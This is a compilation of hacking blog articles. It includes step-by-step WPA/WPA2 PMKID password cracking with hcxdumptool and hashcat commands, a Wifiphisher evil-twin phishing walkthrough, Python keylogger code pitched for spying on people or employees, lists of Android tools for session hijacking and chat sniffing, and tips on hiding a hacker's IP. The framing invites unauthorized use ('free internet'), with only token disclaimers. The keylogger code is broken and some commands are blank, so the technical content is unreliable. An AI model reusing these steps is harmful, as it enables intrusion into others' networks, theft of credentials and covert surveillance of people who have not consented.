How to Hack WiFi Password Using New WPA/WPA2 flaw (Working)

Wifi password hacking: Easily Hack WiFi Password Using New WPA/WPA2 flaw

Are you looking to know how to hack wifi password or ways of wifi password hacking?

This recently discovered flaw will help you hack any WPA/WPA2 network.

Wifi password hacking has become popular as people are always in search of the free internet. But due to the advancement of technology, hacking wifi, and cracking passwords have become a difficult task to do.

The reason is due to the implementation of WPA/WPA2 (wifi protected access) protocols. They made modern routers more secure and less prone to hacking.

How Was The New Wi-Fi Hack Discovered?

Luckily security researchers have revealed a new way to hack these modern wi-fi routers.

This new wifi hacking method was accidentally discovered by Jens Steube (lead developer in popular password-cracking tool Hashcat) while he was analyzing the newly-launched WPA3 protocol.

According to him, this wifi hacking will explicitly work against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.

This wifi password hack will surely allow attackers (aka.Hackers) to recover the Pre-shared Key (PSK) login passwords.

Also Read- How To Hack Wi-Fi Password Without Cracking By Using Wifiphisher

Disclaimer: All content in this article are intended for security research purpose only. Techworm does not support the use of any tool to indulge in unethical practices.

How to Hack WiFi Password Using PMKID

How to Hack wifi Password of routers using WPA/WPA2

4-Way Handshake based PMKID stands for pairwise key management protocol.

According to Steube (security researcher), previous wifi hacking methods requires someone to log into the network so that attackers can capture EAPOL (Extensible Authentication Protocol (EAP) over LAN ) which is a network authentication protocol used in IEEE 802.1X.

Whereas new WIFI hack doesn’t require a user to be on a target network in order to capture credentials. Following are the steps to perform this wifi hack:-

Step-1: A hacker can use a tool such as hcxpcaptool to request the PMKID from the targeted access point and dump the received frame to a file.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

Step-2: Using the hcxpcaptool , the output (in pcapng format) of the frame can be converted into a hash format accepted by Hashcat like this.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step-3:  Now you can use this password cracking tool to obtain the WPA PSK (Pre-Shared Key) password and Boom you did it!

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

That’s the password of your targeted wireless network which may take time to crack depending on its size or length complexity.

Now we are not sure about which vendors this wifi hack technique will work. But Steube said it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

So users are highly advised to protect their WiFi networks with a secure password such as making the use of numbers, characters and some special characters as they are difficult to crack. which will save your wifi from being hacked

At last, we want to admit that this wifi hack won’t work against next-gen WPA3 simply because of the new harder to break protocol.


So this was how to hack wifi password using the new WPA/WPA2 flaw.

We will also like to advise our readers not to download online tools which claim to be a wifi hacker tool, as they may contain malware.

Also Read: 10 Best Wi-Fi Hacking Tools Of 2018

read more

Top 5 Most Useful Kali Linux Tools For Ethical Hackers

Top Kali Linux Tools

Best 5 Kali Linux tools for ethical hackers and security researchers

Kali Linux is one of the most loved distros by the ethical hacking and security community because of its pen-testing and exploit tools. It is a free, and open-source Linux-based operating system designed for digital forensics, penetration testing, reversing, and security auditing. Kali allows you to download a range of security-related programs such as Metasploit, Nmap, Armitage, Burp, and much more that can be used to test your network for security loops. It can run natively when installing on a computer’s hard disk, can be booted from a live CD or live USB, or it can run on a virtual machine. Kali Linux has a lot of tools available to learn and practice.

In this article, we bring to you the top 5 Kali Linux tools that a wannabe (ethical) hacker or security researcher can use.

1. Nmap (Network Mapper)


Abbreviated as Nmap, the Network Mapper is a versatile must-have tool for Network Security, plus it is a free and open source. It is largely used by security researchers and network administrators for network discovery and security auditing. System admins use Nmap for network inventory, determining open ports, managing service upgrade schedules, and monitoring host (A term used for “the computer on a network”) or service uptime.

The tool uses raw IP packets in many creative ways to determine what hosts are available on the network, what services (application name and version) they offer, which type of protocols are being used for providing the services, what operating system (and OS versions and possible patches) and what type and version of packet filters/firewalls are being used by the target.

2. Metasploit Framework


This tool is used for exploiting (utilizing network weakness for making a “backdoor”) vulnerabilities (weak points) on Network. This tool comes in both free and paid versions and not open source. The free version is good for normal exploits but deep penetration requires the paid version which gives you a full set of features. The paid version of Metasploit offers such important features that it deserves the price it claims.

The Metasploit Project is a hugely popular pen-testing (penetration testing) or hacking tool that is used by cybersecurity professionals and ethical hackers. Metasploit is essentially a computer security project that supplies information about known security vulnerabilities and helps to formulate penetration testing and IDS testing.

3. Wireshark


Some Kali Linux users may rate Wireshark as the top Wi-Fi pen-testing tool though it surprisingly missed making it to last year’s list. Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions.Wireshark is one of the best network [protocol]analyzer tools available, if not the best.

With Wireshark, you can analyze a network to the greatest detail to see what’s happening. Wireshark can be used for live packet capturing, deep inspection of hundreds of protocols, browse and filter packets and is multi-platform.

4. Aircrack-ng


The Aircrack suite of Wi-Fi (Wireless) hacking tools are legendary because they are very effective when used in the right hands. This tool also makes it to Concise top 10 for the first time. For those new to this wireless-specific hacking program, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking hacking tool that can recover keys when sufficient data packets have been captured (in monitor mode).

For those tasked with penetrating and auditing wireless networks Aircrack-ng will become your best friend. It’s useful to know that Aircrack-ng implements standard FMS attacks along with some optimizations like KoreK attacks, as well as the PTW attacks to make their attacks more potent. If you are a mediocre hacker then you’ll be able to crack WEP in a few minutes and you ought to be pretty proficient at being able to crack WPA/WPA2.

5.THC Hydra


Concise polls place THC Hydra one place under ‘John The Ripper’ because of user popularity though it is as popular as John The Ripper. Essentially THC Hydra is a fast and stable Network Login Hacking Tool that will use a dictionary or brute-force attacks to try various password and login combinations on the login page.

This hacking tool supports a wide set of protocols including Mail (POP3, IMAP, etc.), Databases, LDAP (Lightweight Directory Access Protocol), SMB, VNC, and SSH (Secure Shell used by VPN software).

Source: Technotification

read more

15 Best Free Hacking Apps And Tools For Android – 2018 Edition

Free Hacking Apps And Tools For Android

Looking to hack Android? In this article, we have provided the best Hacking apps and tools for 2018 to hack using your Android smartphone.

Hacking generally refers to unauthorized intrusion into a computer or a network. Cybersecurity has been a trend from last few years. And recently android pen-testing and security have increased in demand. Hackers keep looking for hacking tools and apps for Android smartphones. so what better than bringing out the latest Android hacking apps and tools

Android, an open source platform based on the Linux kernel, is a great and powerful mobile operating system ever built for smartphones. It allows you to easily change your smartphone UI (user interface), offers millions of free apps in the market, and lets you customize the app by installing Android Custom ROMS. Android smartphones can also run penetration testing and security test from hacking Android apps.

However, it is very important to know about the (ethical) hacking apps or tools available on your Android smartphone.

Also Read- How to Hack WiFi Password Using New WPA/WPA2 flaw

In this article, we bring you a list of top 10 latest Android hacking apps and tools that will turn your Android smartphone into a hacking machine. However, in order to use the apps to its full potential, your device needs to be rooted.

Disclaimer: All content in this article are intended for security research purpose only. Techworm does not support the use of any android hacking apps or tools to indulge in unethical practices.

List of best hacking apps and tools for Android smartphone

  1. AndroRAT

10 best android hacking apps and tools -AndroRAT

AndroRAT, short for Remote Administration Tool for Android, is a client/server application developed in Java Android for the client side and in Java/Swing for the Server, whose goal is to give the control of the Android system remotely and retrieve information from it.

Using this android hacking app, you can easily manipulate other devices, which is quite useful in case you’re away from your device and need to perform some task.

  1. Wi-Fi Kill

10 Best Android Hacking Apps And Tools- wifi kill

This open source ethical hacking android app is one of the most popular ones in this field. Similar to the net cut app in Windows, this app is capable of cutting off anyone’s Wi-Fi over your network.

Wi-Fi Kill is extremely useful when you have an open Wi-Fi not protected by a strong password. You can cut off the Wi-Fi of the intruder by just a few clicks on your device.

This android hacking app is easy to use owing to its lucid and interactive interface and easy-to-use tools.

  1. APK Inspector

10 Best Android Hacking Apps And Tools For 2018- APKinspector

APK Inspector is a great android hacking tool that any general app user will love. It is the perfect GUI tool for analysts to analyze the Android applications as well as understand the coding behind it.

The main purpose of this hacking app is to reverse engineer any Android application. This means you can use this hacking app to get the source code of any Android application and can edit it to remove license and credits.

  1. Arpspoof

10 Best Android Hacking Apps And Tools For 2018- arpspoof

Arpspoof is a network sniffing android app. It changes the network configuration of the victims Android phone. You can redirect the user to the specific web page.

This hacking app works like middlemen attacks apps.

  1. zANTI

10 Best Android Hacking Apps And Tools For 2018- zanti

zANTI is one of the best android app related to hacking from android phone. It has almost all security tools related to hacking any Wi-Fi networks.

  1. Eviloperator

10 Best Android Hacking Apps And Tools For 2018- evil operator

This android hacking app automatically connects two people in a phone call making them feel that they called each other.

Eviloperator tool’s biggest merit would probably have to be that you can record and save the conversation.

  1. Nmap for Android

10 Best Android Hacking Apps And Tools For 2018- nmap for android

Nmap (network mapper) is an open-source security scanner used for network exploration by professionals. It works on both non-rooted and rooted Android smartphones.

However, if your device is rooted then you have access to some more features. You can download this hacking app on your Android device to scan networks for finding ports and system details.

  1. Hackode

10 Best Android Hacking Apps And Tools For 2018- hackode

Hackode is one of the best app for people who want to hack their Android devices.

The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cybersecurity professional to perform different tasks like Google Hacking, Reconnaissance, DNS Dig, Exploits, Security Rss Feed and many more.

  1. SSHDroid- Android Secure Shell

10 Best Android Hacking Apps And Tools For 2018- ssh droid

Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting to your remote machine.

SSHDroid is a SSH server implementation for Android. This hacking app will let you connect to your device from a PC and execute commands (like “terminal” and “ADB shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc…). Windows users can rather control their device using FTP protocol.

Yet another feature of this android hacking tool includes extended notification control, Wi-Fi control, shared-key authentication, lock screen widget.

  1. Fing Network Tools

10 Best Android Hacking Apps And Tools For 2018- fing network tool

It is a free and super-quick system scanner for Android that is used by hackers and security professionals to discover which devices are connected to the Wi-Fi network, map devices, find intruders, evaluate network security risks, troubleshoot network problems and achieve best network performance, with the world’s most popular network toolkit.

Fing is a must-have network utility with more than a dozen free network hacking tools, including Wi-Fi scanner, port scanner, DNS lookup, ping, and service monitoring.

11. cSploit

Free Hacking Apps And Tools For Android - cSploit

cSploit is the most complete and advanced security professional toolkit on Android aimed at IT security experts/geeks. It works on rooted Android and is easily portable. It’s a hacking tool that catalogs the local hosts, installs backdoors, detects vulnerabilities and their exploits find out Wi-Fi password, etc.

12. WPS Connect

Free Hacking Apps And Tools For Android - WPS Connect

WPS Connect is an Android Wi-Fi hacking app that allows you to hack into Wi-Fi networks that have WPS protocol enabled. It works on a rooted Android phone.

This app allows you to disable other user’s net connection on the same Wi-Fi network. With this app, you can hack any Wi-Fi network and connect automatically to any password-protected Wi-Fi network. WPS Connect app also allows you to check if your router is vulnerable or not and act accordingly.

13. Faceniff

Free Hacking Apps And Tools For Android - Faceniff

Faceniff is another Android hacking app that lets anyone intercept and sniff your Wi-Fi network traffic. This app allows you to hijack session (only when WiFi is not using EAP) of popular social networking websites like Twitter, Facebook, and any other social media accounts through Android devices.

14. WhatsApp Sniffer

Free Hacking Apps And Tools For Android - WhatsApp Sniffer

WhatsApp Sniffer is a hacking app that can display messages, download private chats, audios, and videos of other WhatsApp users who are connected to your Wi-Fi network.

15. DroidBox

Free Hacking Apps And Tools For Android - DroidBox

DroidBox is a hacking app that provides dynamic analysis of Android applications. This hacking app can be used to gain results about the hashes for APK package, SMS, phone calls, network traffic, information leaks through a variety of channels. This prepares you to understand the behavior of an Android app package.

Also Read- How to Install and run Kali Linux on any Android Smartphone


Since there are a number of Android hacking apps and tools, we might have missed some from the list! Do let us know your favorite Android hacking tool in the comments section below.

read more

10 Best Websites To Learn Ethical Hacking In 2018

Top 10 Websites To Learn Ethical Hacking In 2018

Who doesn’t want to learn hacking these days? With the constant threat of cyber-attacks and data breach looming large these days, it very important to have basic or even more advanced knowledge in cyber-security to keep your own network or your company’s network secure. In this article, we have listed hacking websites to learn ethical hacking who provides the best tutorial and pdf books on how to learn ethical hacking.

What is ethical and unethical hacking?

However, hacking is not an easy task, as you need to have basic knowledge of computers and network security. For beginners to know, there are two types of hacking: Ethical (White Hat) and Unethical (Black Hat). Unethical hacking is considered illegal while ethical hacking may be regarded as legal.

Ethical hackers or white hat hackers identify system vulnerabilities and access points for penetration and prevent unwanted access to network and information systems. This not only helps them earn lucrative money but also keeps them away from facing prison time.

In this article, we have compiled a list of 10 best websites that teach you ethical hacking. However, it is important to note that as a beginner to not perform any hacking and cracking tactics that breach any cyber law.

List of best hacking websites to learn ethical hacking-

  1. Hackaday

Best Websites To Learn Ethical Hacking

Hackaday is one of the top-ranked hacking sites that provide hacking news and all kinds of tutorials for hacking and networks. It also publishes several latest articles each day with a detailed description of hardware and software hacks so that beginners and hackers are aware of it.

Hackaday also has a YouTube channel where it posts projects and how-to videos. It provides users with mixed content like hardware hacking, signals, computer networks and etc. Besides hackers, this site is also useful for people who are in the field of Digital Forensics and Security Research.

  1. HackThisSite

Best Websites To Learn Ethical Hacking - HackThisSite, commonly referred to as HTS, is an online hacking and security website that gives you hacking news as well as ethical hacking tutorials. It aims to provide users with a way to learn and practice basic and advanced “hacking” skills through a series of challenges, in a safe and legal environment. HTS involves a small, loose team of developers and moderators who maintain its website, IRC server, and related projects.

  1. EC-Council – CEH Ethical Hacking Course

Best Websites To Learn Ethical Hacking

The International Council of Electronic Commerce Consultants (EC-Council) is a member-supported professional organization. The EC-Council is known primarily as a professional certification body. Its best-known certification is the Certified Ethical Hacker. CEH, which stands for Comprehensive Ethical Hacker provides complete ethical hacking and network security training courses to learn white hat hacking.

You just have to select the hacking course package and join to get trained to become a professional ethical hacker. This site helps you to get all kinds of courses that make you a certified ethical hacker.

  1. Break The Security

The motive of the site is explained in its name. Break The Security provides all kind of hacking stuff such as hacking news, hacking attacks and hacking tutorials. It also has a different kind of useful courses that can make you a certified hacker. This site is very helpful if you are looking to choose the security and field of hacking and cracking.

  1. Cybrary

Best Websites To Learn Ethical Hacking

Cybrary offers free online training for the more and most complicated topics in the IT sector that was launched in 2015. The website supports a community of people to keep up-to-date in the field, free lessons and learning materials, and the chance to connect with businesses in the industry.

  1. SecTools

Best Websites To Learn Ethical Hacking

As the name suggests, SecTools means security tools. This site is dedicated to delivering important tricks regarding network security that one can learn to fight against the network security threats. They also provide security tools with detailed description about it.

  1. SecurityTube

Best Websites To Learn Ethical Hacking - SecurityTube

Created by fellow security researcher Vivek Ramachandran, a trusted professional in the security industry, SecurityTube is virtually the YouTube for ethical hacking and information security. You can also learn everything from basic penetration testing to full hacking tool rundowns and other types of attacks. The site offers hundreds of hours of security, vulnerability, and hacking related content.

  1. Evilzone Forum

Best Websites To Learn Ethical Hacking

This hacking forum allows you to see the discussion on hacking and cracking. However, you need to be a member on this site to check out queries and answers regarding ethical hacking. All you need to do is register to get your ID to get an answer for your queries there. The solution to your queries will be answered by professional hackers. Remember not to ask simple hacking tricks, the community people here are very serious.

  1. Hacking Tutorial

Best Websites To Learn Ethical Hacking

This website provides a huge number of tutorials as well as the use of different online tools. You can learn everything here from hacking computer, Gmail, Facebook, DDoS attack and much more. You can also learn about Python, Ruby, Perl, and PHP related hacking task like how to make a Python host, code your first SQL injection, etc.

It also provides you with hacking news, ethical hacking tools, tips and tricks considering hacking. Some of the hacking blog posts in this website are “5 Steps Wi-Fi Hacking – Cracking WPA2 Password”, “Hacking Facebook Using Man in the Middle Attack”, “Shutdown Windows 7 Remotely” and so on. The tutorials can be downloaded too, as they are in pdf format.

  1. Hacking Loops

Best Websites To Learn Ethical Hacking

This is an amazing website for beginners to learn hacking and it has also articles on different topics related to hacking. One can learn ethical hacking, penetration testing, cyber security, best security, and web penetration testing techniques on this website.

You can also set up your own pentesting /hacking lab and learn about different technologies like mobile hacking etc.


Please note that we have provided just 10 hacking sites of the hundreds that exist online and we might have missed some from this list! Let us know your favorite hacking websites to learn ethical hacking and how to’s about hacking in the comments section below.

read more

How To Create a Keylogger using Notepad

How To Create a Keylogger using Notepad

A Keylogger is a very powerful hacking or spying tools. If you are looking to spy on someone’s activity or to check out what your employees do at work you might be looking for ways on how to create a keylogger.

A keylogger is a hacking tool of the newbie but sometimes highly skilled hackers also use them. These are very easy to create and use. So, let’s learn how to create our free keylogger.

What is a keylogger?

Before that, it’s important to know what is a keylogger actually(in case you did not already know). It is a program that records your keystrokes and saves them as a log file either onto a server over a reverse TCP tunnel or on the local machine itself. The server, in this case, is the one hosted by the hacker(you).

Also Read- 15 Best Free Hacking Apps And Tools For Android

So since now, you know what a keylogger is. let’s have a look at a step by step guide on how to make a keylogger.

How To Create a Keylogger Using Notepad?

Let’s get started!

1. Open notepad on your computer and paste the following code in it:
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location
file_log = 'keyloggeroutput.txt'
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent

2. Save the file as keylogger.pyw

3. Fire up your keylogger
Double-click on the file you just created and test it out, then start typing.

When you want to stop logging, open up task manager and kill all the “python” processes. Then look for keyloggeroutput.txt in the same directory were the something.pyw is. Open it up and you should see whatever you typed.

NOTE: You may see some weird looking character if you open it with notepad, those characters means you hit the backspace key.

So this is a simple keylogger that saves the keystrokes on the local machine. You can explore further for more complex keyloggers.

4. Where to go from here?
1. Keylogger Wiki
2. Actual Keylogger for Windows

Also, consider reading the disclaimer before trying it out yourself:

The information provided is for educational purpose only, if a person uses this information for malicious purposes, he/she will be solely responsible for the legal and other consequences.


So this was how you can create a keylogger using a simple method. do let us know if you know of any other method to make it.

read more

How To Hack Wi-Fi Password Without Cracking By Using Wifiphisher

Hack any Wi-Fi password using Wifiphisher without cracking

Disclaimer: This tutorial is for educational purpose only. Hacking Wi-Fi passwords may be illegal in your part of the world. 

One of the many queries we get from our readers is how to hack Wi-Fi password. Though there are many ways to hack Wi-Fi, today we are going to show you how to hack any WiFi password using Wifiphisher. The beauty of Wifiphisher is that it can hack WPA/WPA2 protected Wi-Fi networks without cracking.

Without much ado, here is how you should go about how to hack Wi-Fi password without cracking using Wifiphisher. Read the disclaimer above and proceed at your own risk.

What is WiFiphisher?

Wifiphisher is a security tool that mounts automated phishing attacks against WiFi networks in order to obtain secret passphrases that people use to lack their Wi-Fi networks. Basically, it is a social engineering tool unlike other methods which use brute force attacks. Wifiphisher presents a very easy way of obtaining WPA/WPA2 protected secret passwords.

How does it work?

WiFiphisher creates an evil twin AP, then de-authenticate or DoS the user from their real AP. The Wi-Fi user logs in to find the Wi-Fi needs re-authentication and that is where Wifiphisher works great. The Wifiphisher redirects the Wi-Fi user to fake AP with the same SSID.

After connecting with fake AP, the owner of the Wi-Fi network will see a legitimate looking webpage that requests him/her to input password to “Upgrade firmware.” When the user enters the password in the cloned web page, it is reported back to the hacker without the knowledge of the Wi-Fi user. User allowed further to access the internet from fake evil twin AP, so they can’t feel anything suspicious.

The Wi-Fi owner goes about surfing the internet obvious to the fact that you have hacked his/her Wi-Fi password using Wifiphisher.

Requirements to Hack Wi-Fi using Wifiphisher Hacking tool 

  • PC/laptop running on Kali LINUX
  • Download Wifiphisher from GitHub.

Step 1: Install or Update Python

First, you have to install or update “python” in Kali LINUX. Open the terminal and type below command

apt-get install python

How To Hack Wi-Fi Password Without Cracking By Using Wifiphisher

Step 2: Unpack Wifiphisher script

After installing python, you have to unpack the Wifiphisher.

kali > tar -xvzf /root/wifiphisher-1.1.tar.gz

Alternatively, you can clone the code from GitHub by typing:

kali > git clone https://github/sophron/wifiphisher.git

How To Hack Wi-Fi Password Without Cracking By Using Wifiphisher

Step 3: Navigate to the directory

Navigate to the directory where Wifiphisher has been installed.To navigate type below command in terminal.

cd wifiphisher/

How To Hack Wi-Fi Password Without Cracking By Using Wifiphisher

Now confirm the name of the script. To confirm the name of script, type

ls -l

Step 4: Run the Script “”

To run script type below commands in terminal and hit enter.


How To Hack Wi-Fi Password Without Cracking By Using Wifiphisher

Once installed the first time you run the script, it will likely tell you that “hostapd” is not found and will prompt you to install it. Install by typing “y” for yes. It will then proceed to install hostapd.

When it has completed, once again, execute the Wifiphisher script.

kali > python

This time, it will start the web server on port 8080 and 443, then go about and discover the available Wi-Fi networks. Wifiphisher will get to work and list all the Wi-Fi networks it has discovered.

Step 5: Select AP and Get the Password

From the listed Wi-Fi networks, select your target AP.  To select target just press ctrl+c (to stop scanning) and type “num” of AP. After entering num hit enter. The Wifiphisher will show you the target APs SSID and Mac address. Now let the Wifiphisher do its magic and clone this SSID while jamming the real AP. Once this process is completed, the Wifiphisher will direct the original owner of the Wi-Fi network to the cloned page and ask them to re-authenticate their login credentials.

After connecting to evil twin AP, Wifiphisher serves a legitimate looking proxy web page and display a message to the Wi-Fi owner that his/her firmware is being upgraded and they should enter their username and passphrase.

When the user enters their password, it will be passed to you through the Wifiphisher open terminal. Thus Wifiphisher does its job without cracking or even letting the Wi-Fi user know he/she has been hacked.

read more

Learn How To Hack Using Your Android Smartphone

Learn How To Hack Using Your Android Smartphone

10 Best android apps to learn hacking from your Android smartphone

With more and more people spending more time on their smartphones than PCs, it was just a matter of time until hacking tools made their way onto our handheld devices. Though not as widely used as PCs, smartphones have a pretty decent cache of hacking tools and we’ve rounded up the best of them.

Hacking Tutorials 2.0

For beginners to the world of hacking, this is a pretty decent starting point. This app provides plenty of knowledge in regards to device protection techniques and the easiest way to hack into devices.

Hacking Tutorials

Considered as one of the best tutorial resources available for Android at the moment, the tutorial explains almost all known and practical hacking techniques.

Computer Tricks Guide

As the name suggests, with this app one can learn new tips and tricks of hacking. Though not considered as comprehensive as the other on this list, its still pretty useful.

Hacking Knowledge

This application is another good starting point with a comprehensive knowledge base in terms of theoretical and practical computer hacking techniques.

Become Hacker

Considered one of the best apps for learning the tricks of the trade for an eventual career as an ethical hacker. This tutorial provides a host of information on techniques used by black hat hackers around the globe.

Hack Hackers

This app is a pretty extensive tutorial on memory storage devices including memory cards and USB flash drives and the methods and techniques of securing them.

Hackers Reference

An excellent resource to have in your arsenal for newbies and more experienced personnel alike. This resource offers a host of jargon and their practical usage including, difference between hex and binary.


Another good resource to begin your journey to a career in hacking. This app in particular focuses on phishing, footprinting, batch file viruses, and worms.

Hackers HandBook

This app provides one of the best hacking tutorials with it’s active participation technique.By this app one can quickly master the hacking skills. It is perfect for the newbies and also for those who want to learn advanced hacking techniques.

WhiteHat Hacking Tutorials

Just as the name suggests, this app is a tutorial of techniques and methods used by white hat hackers and is a pretty good stepping stone for those ambitious for a career in white hat hacking. This being a community driven app, makes the deal even sweeter.

read more

How do hackers hide their IP address?

How do hackers hide their IP address?

How do hackers hide their IP address from prying eyes

Hackers are known for breaking into most impregnable web servers around the world and still avoid being caught. One of the main reasons for that is that they hide their IP addresses from prying eyes of the authorities. Using various techniques that we discuss below, a hacker operating from Canada uses IP address of South Korea to conduct leet operations. Have you ever wondered how these hackers remain hidden from the authorities? One obvious thought that comes to mind – how do they cover their tracks while accessing the big bad world of the internet?

There are quite a few recommended methods to be incognito on the internet and it’s not just for hackers but also for ordinary users to stay anonymous. Quite a few people would prefer the rest of the world staying in the dark about their activities. It might be individuals from a nation that represses internet access to someone wanting to access a series on Netflix that’s not available in their country yet. Irrespective of the reason, these tricks should find your attention.


No matter what your level of expertise with technology, a proxy is by far the goto to hide your information on the internet. For those unfamiliar with proxies, a basic idea of how they work – a proxy will reroute your connection from via a third party server so the website you access will not be able to read data specific to you. For example, A lives in England but uses a proxy server based in Germany to access a website W. Now the website, while accessing user information will find user A accessing their site from Germany instead of England. This is just an example, in reality, the proxy will hide all of your information from the resources you access. Any server on the other end will only get the information that you provide.
There are plenty of free and paid proxies available. Although a word of caution. If you intend to use a proxy to carry out some serious work, its recommended to stay away from a free proxy for the sheer number of individuals that will be using this free proxy at any given time. If you do manage to get a stable connection, it’ll last for a short while.

Some popular proxies:

  • BuyProxies
  • HideMyAss
  • MyPrivateProxies
  • YourPrivateProxy
  • EZProxies
  • Anonymous-Proxies
  • LimeProxies
  • SSLPrivateProxy
  • NewIPNow
  • ProxyNVPN
  • SquidProxies


Another popular approach to hide your tracks and a very popular one – using the TOR browser and the Tor network. The Tor network in simpler terms sounds like a proxy on steroids. The network will bounce your connection across multiple points to provide even higher anonymity to it’s user. Their network contains multiple tunnels across the globe, that are used to bounce the users signal. The network is accessed from the Tor browser and websites on the network have a specific address that you need to know to be able to access them. While it does provide anonymity, one should also note the threats from using the network. Being anonymous also means the people you interact with are anonymous. Also note-worthy is the fact that though the network is secure, the browser itself isn’t. The Tor browser is just a variation of the Firefox browser and is susceptible to everything Firefox is susceptible to.


A virtual network provider will be the next level of security. A VPN basically extends a private network over the public internet, which in turn scrambles the data passing between you and a web server leaving it useless for anyone trying to access it. While it doesn’t prevent someone from attacking your machine directly, it does a pretty good job of hiding your identity. Using a VPN in combination with any of the two mentioned methods might offer you the best possible way to hide your identity on the internet.

The Extreme Option

One should note however secure these options may sound, there is always a thin possibility of someone tracking your machine. even with all 3 of these options, one can still manage to send a malware to your machine or simply try and track down your MAC address. If one wishes to cover one’s tracks on the Internet, find a free WiFi access point, modify your WiFi card’s MAC address, and boot your computer from a “live CD”, running totally in the RAM will give you the absolute highest order of anonymity possible.

read more

8 Best TV Series About Hacking And Technology That You Must Watch

8 Best TV Series About Hacking And Technology That You Must Watch

Top 8 TV shows (serials) that have ‘Hackers’ and show hacking tech correct

Hacking has always been shown on screens as a nerdy geeky character sitting on computer screens and pressing a button and kaboom! The computer network at the opposite end which in all probability is an FBI server is hacked. Hacking always generates glamor and mystery and adds that special oomph factor to the movie or TV show. But rarely has any movie director shown the skillful art of hacking in the right perspective. It is because, behind every hack, there is this banal and routine work of finding the vulnerability and exploiting it and this may take days and sometimes weeks for even a good hacker.

11 Best Hacking Movies That You Should Watch Right Now

With technology becoming the center point of human lives, hacking which was often relegated to a single scene in the climax of an action adventure movie or TV show is now often finding a place in the central plot. In fact, many new movies and TV shows have hacking has the main plot with human melodrama relegated to the subplot. TV shows have more options of showing hackers and hacking in right perspective as they have ample screen time compared to movies which have to cramp everything up in the 2 hours of runtime.  In this article, we bring out the top TV shows which have hacking as the central theme and try to picture hackers and the glamorous art of hacking in the right perspective.

Top 8 best TV series which show hackers in correct perspective

#1 Mr. Robot :

Mr. Robot Poster

Mr.Robot has become a cult TV show for millions of its followers. “Mr. Robot” is probably the first TV show that accurately portrays an elite hacker group that uses computers, mobile devices, different technologies, programming and social engineering to penetrate secure networks and take down evil corporations, all the while trying to remain anonymous. It shows code being written in Python, IRC chats and Raspberry PI computers, just to name a few. The TV show follows that life of Elliot, a young programmer working as a cyber-security engineer by day, and a vigilante hacker by night.

#2 The IT Crowd

The IT Crowd Poster

The second TV show on our top list is The IT Crowd. Though The IT Crowd is not a proper hacking oriented TV show like Mr.Robot, it has its own moments of hacks. The IT Crowd was very popular among viewers and had a successful run for 8 years from 2006 to 2013. The TV follows comedic capers of a rag-tag group of technical support workers at a large corporation.

#3 Silicon Valley

Silicon Valley Poster

Silicon Valley has more to do with boardroom battles in the tech world rather than hacking. However, it does portray the tech and hacking correctly with a bit of comic touch. The serial shows the high-tech gold rush of modern Silicon Valley and the cut-throat competition techies face. In the TV show, the people most qualified to succeed are shown as least successful and underdogs without any qualifications making it big. The TV show started in 2014 and is till going strong after a run of 3 years.

#4 Person of Interest 

Person of Interest Poster

Person of Interest takes a place in our top list because it has Artificial Intelligence as the central plot. The TV shows the protagonist, an ex-assassin and a wealthy programmer who uses AI to save lives. The TV show shows a vast array of AI network that lists the upcoming crimes and criminals deduced through machine learning technique.  However, the details of the crimes–including the civilians’ roles–are left a mystery.

#5 Halt and Catch Fire

Halt and Catch Fire Poster

Halt and Catch Fire has been running successfully since 2014 and portrays the tech crowd from 1980. The  TV show captures the exact office ongoings in those early years of PCs through the eyes of a visionary inventor ala Steve Jobs.

#6 Chuck

Chuck Poster

Chuck follows a mainstream plot of a hacker downloading a top secret document and it ruining his life. The TV show was quite popular and ran from 2007 to 2012. The TV show captures the life of a 20-year-old hacker and nerd who inadvertently downloads US government secrets into his brain. The serial explores his life even CIA and NSA agents protect him and at the same time exploit him.

#8 CSI: Cyber

CSI: Cyber Poster

At number 8 is CSI : Cyber which captures the hacker world beautifully. The TV serial ended its run in 2016 and was thought to continue but the producers have pulled the plug. CSI : Cyber follows the life of FBI special agent Avery Ryan works to solve crimes as a cyber-psychologist. The serial brings out several plots and twists as Ryan tries to map the brain of hackers and cyber criminals.

read more

5 Best Hacking Books You Must Read To Be A Hacker

5 Best Hacking Books You Must Read To Be A Hacker

Know How To Hack By Reading These 5 best Hacking Books

With the increase in the use of internet, there is now a high demand for computer experts who can conduct ethical hacking operations. However, it is not an easy task to become an expert until you have basic knowledge about computers and network security. For beginners to start with, it is very important for them to know that there are two types of hacking: Ethical (White Hat) and Unethical (Black Hat).

Ethical hacking (legal) is defined as making use of programming skills, so as to penetrate a computer system, and identify weaknesses in data computer security for business and organizations across the globe, to protect them from hackers or criminals with less honest motives. This not only helps them earn a good and honest living but also keeps them away from facing prison time. On the other hand, in Unethical hacking (illegal) is used by hackers to penetrate into a computer system and exploit it for their own personal gains or mischief.

So, considering that you are looking to learn to hack and apply it in an ethical way, we have some tips for you as a beginner.

Learning hacking has always been tough for beginners not because it’s very difficult, but because they do not have a proper source of learning. Since having an appropriate guide is very essential in this field, experts always recommend reading books initially.

In this article, we provide you with a list of books that offers you white hat content. However, it is important to note that as a beginner to not perform any hacking & cracking tactics that breach any cyber law.

According to us, given below are the 5 top books on ethical hacking for beginners that will provide the best knowledge about security:

The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)

BEST HACKING BOOK- The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy

This is probably the best hacking book for beginners because it covers a range of chapters on penetration testing and hacking, which instructs without assuming that the reader has any prior hacking knowledge. It teaches you how to perform an ethical hack from very basic. It provides a step-by-step journey of penetration testing, moving from Information Gathering to Scanning, Exploitation and finally, Report Writing.

